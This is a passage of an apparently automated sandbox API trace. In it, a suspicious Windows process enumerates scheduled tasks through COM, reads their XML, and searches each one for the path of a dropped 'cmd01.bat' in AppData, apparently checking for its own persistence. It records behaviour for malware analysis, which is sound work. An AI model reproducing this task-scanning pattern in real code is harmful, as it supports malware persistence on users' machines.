pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0163.457] IUnknown:Release (This=0x929590) returned 0x0 [0163.457] TaskScheduler:IUnknown:Release (This=0x9294c0) returned 0x0 [0163.457] ITaskFolderCollection:get_Item (in: This=0x929340, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x15, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9294c0) returned 0x0 [0163.457] ITaskFolder:GetTasks (in: This=0x9294c0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x929590) returned 0x0 [0163.461] IRegisteredTaskCollection:get_Count (in: This=0x929590, pCount=0xce048 | out: pCount=0xce048*=2) returned 0x0 [0163.461] IRegisteredTaskCollection:get_Item (in: This=0x929590, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929720) returned 0x0 [0163.461] IRegisteredTask:get_Name (in: This=0x929720, pName=0xce058 | out: pName=0xce058*="Diagnostics") returned 0x0 [0163.461] IRegisteredTask:get_Xml (in: This=0x929720, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n \\Microsoft\\Windows\\DiskFootprint\\Diagnostics\r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n true\r\n true\r\n PT1H\r\n IgnoreNew\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P1D\r\n P7D\r\n \r\n \r\n \r\n \r\n \r\n %windir%\\system32\\disksnapshot.exe\r\n -z\r\n \r\n \r\n") returned 0x0 [0163.463] StrStrIW (lpFirst="\r\n\r\n \r\n \\Microsoft\\Windows\\DiskFootprint\\Diagnostics\r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n true\r\n true\r\n PT1H\r\n IgnoreNew\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P1D\r\n P7D\r\n \r\n \r\n \r\n \r\n \r\n %windir%\\system32\\disksnapshot.exe\r\n -z\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0163.463] IUnknown:Release (This=0x929720) returned 0x0 [0163.463] IRegisteredTaskCollection:get_Item (in: This=0x929590, index=0xce098*(varType=0x3, wReserved1=0x337b, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929720) returned 0x0 [0163.463] IRegisteredTask:get_Name (in: This=0x929720, pName=0xce058 | out: pName=0xce058*="StorageSense") returned 0x0 [0163.463] IRegisteredTask:get_Xml (in: This=0x929720, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n \\Microsoft\\Windows\\DiskFootprint\\StorageSense\r\n \r\n \r\n \r\n S-1-5-32-545\r\n HighestAvailable\r\n \r\n \r\n \r\n true\r\n true\r\n PT1H\r\n IgnoreNew\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P7D\r\n P14D\r\n \r\n \r\n \r\n \r\n \r\n %windir%\\system32\\rundll32.exe\r\n %windir%\\system32\\StorageUsage.dll,GetStorageUsageInfo\r\n \r\n \r\n") returned 0x0 [0163.466] StrStrIW (lpFirst="\r\n\r\n \r\n \\Microsoft\\Windows\\DiskFootprint\\StorageSense\r\n \r\n \r\n \r\n S-1-5-32-545\r\n HighestAvailable\r\n \r\n \r\n \r\n true\r\n true\r\n PT1H\r\n IgnoreNew\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P7D\r\n P14D\r\n \r\n \r\n \r\n \r\n \r\n %windir%\\system32\\rundll32.exe\r\n %windir%\\system32\\StorageUsage.dll,GetStorageUsageInfo\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0163.466] IUnknown:Release (This=0x929720) returned 0x0 [0163.466] IUnknown:Release (This=0x929590) returned 0x0 [0163.466] ITaskFolder:GetFolders (in: This=0x9294c0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x929590) returned 0x0 [0163.469] ITaskFolderCollection:get_Count (in: This=0x929590, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0163.469] IUnknown:Release (This=0x929590) returned 0x0 [0163.469] TaskScheduler:IUnknown:Release (This=0x9294c0) returned 0x0 [0163.469] ITaskFolderCollection:get_Item (in: This=0x929340, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x16, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9294c0) returned 0x0 [0163.469] ITaskFolder:GetTasks (in: This=0x9294c0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x929580) returned 0x0 [0163.472] IRegisteredTaskCollection:get_Count (in: This=0x929580, pCount=0xce048 | out: pCount=0xce048*=1) returned 0x0 [0163.472] IRegisteredTaskCollection:get_Item (in: This=0x929580, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x9296f0) returned 0x0 [0163.472] IRegisteredTask:get_Name (in: This=0x9296f0, pName=0xce058 | out: pName=0xce058*="dusmtask") returned 0x0 [0163.472] IRegisteredTask:get_Xml (in: This=0x9296f0, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n D:(A;;FA;;;SY)(A;;FA;;;BA)(A;;FA;;;S-1-5-80-4155767994-3874329934-3800885181-2130851812-726865888)(A;;FRFX;;;AU)(A;;FRFX;;;BU)(A;;FRFX;;;IU)\r\n \\Microsoft\\Windows\\DUSM\\dusmtask\r\n \r\n \r\n \r\n S-1-5-4\r\n \r\n \r\n \r\n false\r\n false\r\n Queue\r\n \r\n false\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 7508BCA3291B950C\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\System32\\dusmtask.exe\r\n \r\n \r\n") returned 0x0 [0163.474] StrStrIW (lpFirst="\r\n\r\n \r\n D:(A;;FA;;;SY)(A;;FA;;;BA)(A;;FA;;;S-1-5-80-4155767994-3874329934-3800885181-2130851812-726865888)(A;;FRFX;;;AU)(A;;FRFX;;;BU)(A;;FRFX;;;IU)\r\n \\Microsoft\\Windows\\DUSM\\dusmtask\r\n \r\n \r\n \r\n S-1-5-4\r\n \r\n \r\n \r\n false\r\n false\r\n Queue\r\n \r\n false\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 7508BCA3291B950C\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\System32\\dusmtask.exe\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0163.475] IUnknown:Release (This=0x9296f0) returned 0x0 [0163.475] IUnknown:Release (This=0x929580) returned 0x0 [0163.475] ITaskFolder:GetFolders (in: This=0x9294c0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x929580) returned 0x0 [0163.481] ITaskFolderCollection:get_Count (in: This=0x929580, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0163.481] IUnknown:Release (This=0x929580) returned 0x0 [0163.481] TaskScheduler:IUnknown:Release (This=0x9294c0) returned 0x0 [0163.481] ITaskFolderCollection:get_Item (in: This=0x929340, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x17, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9294c0) returned 0x0 [0163.481] ITaskFolder:GetTasks (in: This=0x9294c0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x929590) returned 0x0 [0163.490] IRegisteredTaskCollection:get_Count (in: This=0x929590, pCount=0xce048 | out: pCount=0xce048*=0) returned 0x0 [0163.490] IUnknown:Release (This=0x929590) returned 0x0 [0163.490] ITaskFolder:GetFolders (in: This=0x9294c0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x929590) returned 0x0 [0163.493] ITaskFolderCollection:get_Count (in: This=0x929590, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0163.493] IUnknown:Release (This=0x929590) returned 0x0 [0163.493] TaskScheduler:IUnknown:Release (This=0x9294c0) returned 0x0 [0163.493] ITaskFolderCollection:get_Item (in: This=0x929340, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x18, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9294c0) returned 0x0 [0163.493] ITaskFolder:GetTasks (in: This=0x9294c0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x929590) returned 0x0 [0163.496] IRegisteredTaskCollection:get_Count (in: This=0x929590, pCount=0xce048 | out: pCount=0xce048*=2) returned 0x0 [0163.496] IRegisteredTaskCollection:get_Item (in: This=0x929590, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929710) returned 0x0 [0163.497] IRegisteredTask:get_Name (in: This=0x929710, pName=0xce058 | out: pName=0xce058*="EnableErrorDetailsUpdate") returned 0x0 [0163.497] IRegisteredTask:get_Xml (in: This=0x929710, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n $(@%SystemRoot%\\system32\\ErrorDetailsUpdate.dll,-600)\r\n $(@%SystemRoot%\\system32\\ErrorDetailsUpdate.dll,-601)\r\n \\Microsoft\\Windows\\ErrorDetails\\EnableErrorDetailsUpdate\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n false\r\n PT1M\r\n IgnoreNew\r\n 6\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 7508BCA33E1B9611\r\n \r\n \r\n \r\n \r\n {FE285C8C-5360-41C1-A700-045501C740DE}\r\n \r\n \r\n") returned 0x0 [0163.498] StrStrIW (lpFirst="\r\n\r\n \r\n $(@%SystemRoot%\\system32\\ErrorDetailsUpdate.dll,-600)\r\n $(@%SystemRoot%\\system32\\ErrorDetailsUpdate.dll,-601)\r\n \\Microsoft\\Windows\\ErrorDetails\\EnableErrorDetailsUpdate\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n false\r\n PT1M\r\n IgnoreNew\r\n 6\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 7508BCA33E1B9611\r\n \r\n \r\n \r\n \r\n {FE285C8C-5360-41C1-A700-045501C740DE}\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0163.499] IUnknown:Release (This=0x929710) returned 0x0 [0163.499] IRegisteredTaskCollection:get_Item (in: This=0x929590, index=0xce098*(varType=0x3, wReserved1=0x3335, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929710) returned 0x0 [0163.499] IRegisteredTask:get_Name (in: This=0x929710, pName=0xce058 | out: pName=0xce058*="ErrorDetailsUpdate") returned 0x0 [0163.499] IRegisteredTask:get_Xml (in: This=0x929710, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n $(@%systemroot%\\system32\\ErrorDetailsUpdate.dll,-600)\r\n $(@%SystemRoot%\\system32\\ErrorDetailsUpdate.dll,-601)\r\n \\Microsoft\\Windows\\ErrorDetails\\ErrorDetailsUpdate\r\n \r\n \r\n \r\n S-1-5-20\r\n \r\n \r\n \r\n true\r\n true\r\n false\r\n PT5M\r\n IgnoreNew\r\n \r\n 3\r\n PT2H\r\n \r\n true\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P14D\r\n \r\n \r\n \r\n \r\n \r\n {9CDA66BE-3271-4723-8D35-DD834C58AD92}\r\n \r\n \r\n") returned 0x0 [0163.500] StrStrIW (lpFirst="\r\n\r\n \r\n $(@%systemroot%\\system32\\ErrorDetailsUpdate.dll,-600)\r\n $(@%SystemRoot%\\system32\\ErrorDetailsUpdate.dll,-601)\r\n \\Microsoft\\Windows\\ErrorDetails\\ErrorDetailsUpdate\r\n \r\n \r\n \r\n S-1-5-20\r\n \r\n \r\n \r\n true\r\n true\r\n false\r\n PT5M\r\n IgnoreNew\r\n \r\n 3\r\n PT2H\r\n \r\n true\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P14D\r\n \r\n \r\n \r\n \r\n \r\n {9CDA66BE-3271-4723-8D35-DD834C58AD92}\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0163.500] IUnknown:Release (This=0x929710) returned 0x0 [0163.500] IUnknown:Release (This=0x929590) returned 0x0 [0163.500] ITaskFolder:GetFolders (in: This=0x9294c0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x929590) returned 0x0 [0163.505] ITaskFolderCollection:get_Count (in: This=0x929590, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0163.505] IUnknown:Release (This=0x929590) returned 0x0 [0163.505] TaskScheduler:IUnknown:Release (This=0x9294c0) returned 0x0 [0163.505] ITaskFolderCollection:get_Item (in: This=0x929340, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x19, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9294c0) returned 0x0 [0163.505] ITaskFolder:GetTasks (in: This=0x9294c0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x929580) returned 0x0 [0163.508] IRegisteredTaskCollection:get_Count (in: This=0x929580, pCount=0xce048 | out: pCount=0xce048*=0) returned 0x0 [0163.508] IUnknown:Release (This=0x929580) returned 0x0 [0163.508] ITaskFolder:GetFolders (in: This=0x9294c0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x929580) returned 0x0 [0163.511] ITaskFolderCollection:get_Count (in: This=0x929580, pCount=0xce044 | out: pCount=0xce044*=1) returned 0x0 [0163.511] ITaskFolderCollection:get_Item (in: This=0x929580, index=0xce080*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppFolder=0xce030 | out: ppFolder=0xce030*=0x929710) returned 0x0 [0163.511] ITaskFolder:GetTasks (in: This=0x929710, flags=1, ppTasks=0xcdea0 | out: ppTasks=0xcdea0*=0x9297e0) returned 0x0 [0163.515] IRegisteredTaskCollection:get_Count (in: This=0x9297e0, pCount=0xcde98 | out: pCount=0xcde98*=1) returned 0x0 [0163.515] IRegisteredTaskCollection:get_Item (in: This=0x9297e0, index=0xcdee8*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xcde88 | out: ppRegisteredTask=0xcde88*=0x929970) returned 0x0 [0163.515] IRegisteredTask:get_Name (in: This=0x929970, pName=0xcdea8 | out: pName=0xcdea8*="DmClient") returned 0x0 [0163.515] IRegisteredTask:get_Xml (in: This=0x929970, pXml=0xcde80 | out: pXml=0xcde80*="\r\n\r\n \r\n $(@%systemRoot%\\system32\\dmclient.exe,-201)\r\n $(@%systemRoot%\\system32\\dmclient.exe,-200)\r\n $(@%systemRoot%\\system32\\dmclient.exe,-202)\r\n \\Microsoft\\Windows\\Feedback\\Siuf\\DmClient\r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n PT5M\r\n IgnoreNew\r\n true\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P1D\r\n P3D\r\n \r\n \r\n \r\n \r\n \r\n %windir%\\system32\\dmclient.exe\r\n \r\n \r\n") returned 0x0 [0163.517] StrStrIW (lpFirst="\r\n\r\n \r\n $(@%systemRoot%\\system32\\dmclient.exe,-201)\r\n $(@%systemRoot%\\system32\\dmclient.exe,-200)\r\n $(@%systemRoot%\\system32\\dmclient.exe,-202)\r\n \\Microsoft\\Windows\\Feedback\\Siuf\\DmClient\r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n PT5M\r\n IgnoreNew\r\n true\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P1D\r\n P3D\r\n \r\n \r\n \r\n \r\n \r\n %windir%\\system32\\dmclient.exe\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0163.518] IUnknown:Release (This=0x929970) returned 0x0 [0163.518] IUnknown:Release (This=0x9297e0) returned 0x0 [0163.518] ITaskFolder:GetFolders (in: This=0x929710, flags=0, ppFolders=0xcde88 | out: ppFolders=0xcde88*=0x9297e0) returned 0x0 [0163.520] ITaskFolderCollection:get_Count (in: This=0x9297e0, pCount=0xcde94 | out: pCount=0xcde94*=0) returned 0x0 [0163.520] IUnknown:Release (This=0x9297e0) returned 0x0 [0163.521] TaskScheduler:IUnknown:Release (This=0x929710) returned 0x0 [0163.521] IUnknown:Release (This=0x929580) returned 0x0 [0163.521] TaskScheduler:IUnknown:Release (This=0x9294c0) returned 0x0 [0163.521] ITaskFolderCollection:get_Item (in: This=0x929340, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1a, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9294c0) returned 0x0 [0163.521] ITaskFolder:GetTasks (in: This=0x9294c0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x9295c0) returned 0x0 [0163.524] IRegisteredTaskCollection:get_Count (in: This=0x9295c0, pCount=0xce048 | out: pCount=0xce048*=1) returned 0x0 [0163.524] IRegisteredTaskCollection:get_Item (in: This=0x9295c0, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929770) returned 0x0 [0163.524] IRegisteredTask:get_Name (in: This=0x929770, pName=0xce058 | out: pName=0xce058*="Property Definition Sync") returned 0x0 [0163.524] IRegisteredTask:get_Xml (in: This=0x929770, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n D:(D;;SD;;;AU)(A;;FRFWFX;;;AU)\r\n $(@%systemroot%\\system32\\srm.dll,-18000)\r\n $(@%systemroot%\\system32\\srm.dll,-18001)\r\n $(@%systemroot%\\system32\\srm.dll,-18002)\r\n \\Microsoft\\Windows\\File Classification Infrastructure\\Property Definition Sync\r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n PT5M\r\n IgnoreNew\r\n true\r\n true\r\n \r\n PT1M\r\n PT1M\r\n false\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 2006-11-09T03:00:00\r\n PT4H\r\n \r\n 1\r\n \r\n \r\n \r\n \r\n \r\n {2AE64751-B728-4D6B-97A0-B2DA2E7D2A3B}\r\n \r\n \r\n") returned 0x0 [0163.526] StrStrIW (lpFirst="\r\n\r\n \r\n D:(D;;SD;;;AU)(A;;FRFWFX;;;AU)\r\n $(@%systemroot%\\system32\\srm.dll,-18000)\r\n $(@%systemroot%\\system32\\srm.dll,-18001)\r\n $(@%systemroot%\\system32\\srm.dll,-18002)\r\n \\Microsoft\\Windows\\File Classification Infrastructure\\Property Definition Sync\r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n PT5M\r\n IgnoreNew\r\n true\r\n true\r\n \r\n PT1M\r\n PT1M\r\n false\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 2006-11-09T03:00:00\r\n PT4H\r\n \r\n 1\r\n \r\n \r\n \r\n \r\n \r\n {2AE64751-B728-4D6B-97A0-B2DA2E7D2A3B}\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0163.526] IUnknown:Release (This=0x929770) returned 0x0 [0163.526] IUnknown:Release (This=0x9295c0) returned 0x0 [0163.526] ITaskFolder:GetFolders (in: This=0x9294c0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x9295c0) returned 0x0 [0163.529] ITaskFolderCollection:get_Count (in: This=0x9295c0, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0163.529] IUnknown:Release (This=0x9295c0) returned 0x0 [0163.529] TaskScheduler:IUnknown:Release (This=0x9294c0) returned 0x0 [0163.529] ITaskFolderCollection:get_Item (in: This=0x929340, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1b, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9294c0) returned 0x0 [0163.529] ITaskFolder:GetTasks (in: This=0x9294c0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x929590) returned 0x0 [0163.535] IRegisteredTaskCollection:get_Count (in: This=0x929590, pCount=0xce048 | out: pCount=0xce048*=1) returned 0x0 [0163.535] IRegisteredTaskCollection:get_Item (in: This=0x929590, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929710) returned 0x0 [0163.535] IRegisteredTask:get_Name (in: This=0x929710, pName=0xce058 | out: pName=0xce058*="File History (maintenance mode)") returned 0x0 [0163.535] IRegisteredTask:get_Xml (in: This=0x929710, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n 1.0\r\n 2010-08-12T00:00:00\r\n D:(A;OICI;FA;;;BA)(A;OICI;FA;;;SY)(A;OICI;FRFX;;;LS)(A;OICI;FRFX;;;AU)\r\n $(@%systemRoot%\\system32\\fhtask.dll,-200)\r\n $(@%systemRoot%\\system32\\fhtask.dll,-201)\r\n $(@%systemRoot%\\system32\\fhtask.dll,-202)\r\n \\Microsoft\\Windows\\FileHistory\\File History (maintenance mode)\r\n \r\n \r\n \r\n S-1-5-19\r\n \r\n \r\n \r\n true\r\n true\r\n PT0S\r\n IgnoreNew\r\n \r\n false\r\n false\r\n \r\n true\r\n \r\n P3D\r\n P7D\r\n \r\n \r\n \r\n \r\n \r\n {89917B7C-A1A6-11DF-8BF6-18A90531A85A}\r\n \r\n \r\n") returned 0x0 [0163.536] StrStrIW (lpFirst="\r\n\r\n \r\n 1.0\r\n 2010-08-12T00:00:00\r\n D:(A;OICI;FA;;;BA)(A;OICI;FA;;;SY)(A;OICI;FRFX;;;LS)(A;OICI;FRFX;;;AU)\r\n $(@%systemRoot%\\system32\\fhtask.dll,-200)\r\n $(@%systemRoot%\\system32\\fhtask.dll,-201)\r\n $(@%systemRoot%\\system32\\fhtask.dll,-202)\r\n \\Microsoft\\Windows\\FileHistory\\File History (maintenance mode)\r\n \r\n \r\n \r\n S-1-5-19\r\n \r\n \r\n \r\n true\r\n true\r\n PT0S\r\n IgnoreNew\r\n \r\n false\r\n false\r\n \r\n true\r\n \r\n P3D\r\n P7D\r\n \r\n \r\n \r\n \r\n \r\n {89917B7C-A1A6-11DF-8BF6-18A90531A85A}\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0163.536] IUnknown:Release (This=0x929710) returned 0x0 [0163.536] IUnknown:Release (This=0x929590) returned 0x0 [0163.537] ITaskFolder:GetFolders (in: This=0x9294c0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x929590) returned 0x0 [0163.539] ITaskFolderCollection:get_Count (in: This=0x929590, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0163.539] IUnknown:Release (This=0x929590) returned 0x0 [0163.539] TaskScheduler:IUnknown:Release (This=0x9294c0) returned 0x0 [0163.539] ITaskFolderCollection:get_Item (in: This=0x929340, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1c, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9294c0) returned 0x0 [0163.539] ITaskFolder:GetTasks (in: This=0x9294c0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x9295b0) returned 0x0 [0163.543] IRegisteredTaskCollection:get_Count (in: This=0x9295b0, pCount=0xce048 | out: pCount=0xce048*=2) returned 0x0 [0163.543] IRegisteredTaskCollection:get_Item (in: This=0x9295b0, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929750) returned 0x0 [0163.543] IRegisteredTask:get_Name (in: This=0x929750, pName=0xce058 | out: pName=0xce058*="Installation") returned 0x0 [0163.543] IRegisteredTask:get_Xml (in: This=0x929750, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n D:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;IU)\r\n $(@%systemRoot%\\System32\\LanguageComponentsInstaller.Dll,-601)\r\n $(@%systemRoot%\\System32\\LanguageComponentsInstaller.Dll,-600)\r\n $(@%systemRoot%\\System32\\LanguageComponentsInstaller.Dll,-602)\r\n \\Microsoft\\Windows\\LanguageComponentsInstaller\\Installation\r\n \r\n \r\n \r\n S-1-5-4\r\n \r\n \r\n \r\n true\r\n false\r\n PT1H\r\n Queue\r\n true\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n PT15M\r\n \r\n P1D\r\n \r\n \r\n \r\n \r\n \r\n \r\n {6F58F65F-EC0E-4ACA-99FE-FC5A1A25E4BE}\r\n \r\n \r\n \r\n") returned 0x0 [0163.546] StrStrIW (lpFirst="\r\n\r\n \r\n D:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;IU)\r\n $(@%systemRoot%\\System32\\LanguageComponentsInstaller.Dll,-601)\r\n $(@%systemRoot%\\System32\\LanguageComponentsInstaller.Dll,-600)\r\n $(@%systemRoot%\\System32\\LanguageComponentsInstaller.Dll,-602)\r\n \\Microsoft\\Windows\\LanguageComponentsInstaller\\Installation\r\n \r\n \r\n \r\n S-1-5-4\r\n \r\n \r\n \r\n true\r\n false\r\n PT1H\r\n Queue\r\n true\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n PT15M\r\n \r\n P1D\r\n \r\n \r\n \r\n \r\n \r\n \r\n {6F58F65F-EC0E-4ACA-99FE-FC5A1A25E4BE}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0163.546] IUnknown:Release (This=0x929750) returned 0x0 [0163.546] IRegisteredTaskCollection:get_Item (in: This=0x9295b0, index=0xce098*(varType=0x3, wReserved1=0x3335, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929750) returned 0x0 [0163.546] IRegisteredTask:get_Name (in: This=0x929750, pName=0xce058 | out: pName=0xce058*="Uninstallation") returned 0x0 [0163.546] IRegisteredTask:get_Xml (in: This=0x929750, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n D:P(A;;FA;;;BA)(A;;FA;;;SY)\r\n $(@%systemRoot%\\System32\\LanguageComponentsInstaller.Dll,-601)\r\n $(@%systemRoot%\\System32\\LanguageComponentsInstaller.Dll,-600)\r\n $(@%systemRoot%\\System32\\LanguageComponentsInstaller.Dll,-603)\r\n \\Microsoft\\Windows\\LanguageComponentsInstaller\\Uninstallation\r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n true\r\n false\r\n false\r\n PT1H\r\n Queue\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P7D\r\n P14D\r\n \r\n \r\n \r\n \r\n \r\n {6F58F65F-EC0E-4ACA-99FE-FC5A1A25E4BE}\r\n \r\n \r\n \r\n") returned 0x0 [0163.548] StrStrIW (lpFirst="\r\n\r\n \r\n D:P(A;;FA;;;BA)(A;;FA;;;SY)\r\n $(@%systemRoot%\\System32\\LanguageComponentsInstaller.Dll,-601)\r\n $(@%systemRoot%\\System32\\LanguageComponentsInstaller.Dll,-600)\r\n $(@%systemRoot%\\System32\\LanguageComponentsInstaller.Dll,-603)\r\n \\Microsoft\\Windows\\LanguageComponentsInstaller\\Uninstallation\r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n true\r\n false\r\n false\r\n PT1H\r\n Queue\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P7D\r\n P14D\r\n \r\n \r\n \r\n \r\n \r\n {6F58F65F-EC0E-4ACA-99FE-FC5A1A25E4BE}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0163.548] IUnknown:Release (This=0x929750) returned 0x0 [0163.548] IUnknown:Release (This=0x9295b0) returned 0x0 [0163.548] 